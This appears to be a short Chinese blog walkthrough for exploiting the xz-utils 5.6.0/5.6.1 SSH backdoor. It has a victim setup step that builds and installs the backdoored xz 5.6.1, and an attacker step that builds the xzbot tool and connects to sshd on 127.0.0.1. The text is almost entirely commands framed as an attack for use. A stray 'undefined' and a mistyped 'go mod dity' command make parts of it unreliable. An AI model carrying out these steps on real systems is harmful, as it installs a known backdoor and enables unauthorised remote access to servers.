undefined
前言
通过安装xz-utils的5.6.0版本或5.6.1版本实现ssh免密登录
漏洞利用前提
1
| ldd $(which sshd) | grep lzma
|
1
| liblzma.so.5 => /usr/lib/x86_64-linux-gnu/liblzma.so.5
|
受害者安装特定版本的xz
下载项目
1
2
3
| wget https://github.com/tukaani-project/xz/releases/download/v5.6.1/xz-5.6.1.tar.gz
tar -zxvf xz-5.6.1.tar.gz
cd xz-5.6.1
|
编译并安装
1
2
3
| ./configure
make
make install
|
查看版本号
攻击者通过后门私钥认证SSH
下载依赖
直接下载可执行文件
1
| go install github.com/amlweems/xzbot@latest
|
手动编译
下载项目
1
2
| git clone https://github.com/amlweems/xzbot.git
cd xzbot
|
编译
1
2
| go mod dity
go build -o xzbot main.go
|
添加可执行权限
建立SSH连接
1
| xzbot -addr "127.0.0.1:22"
|
完成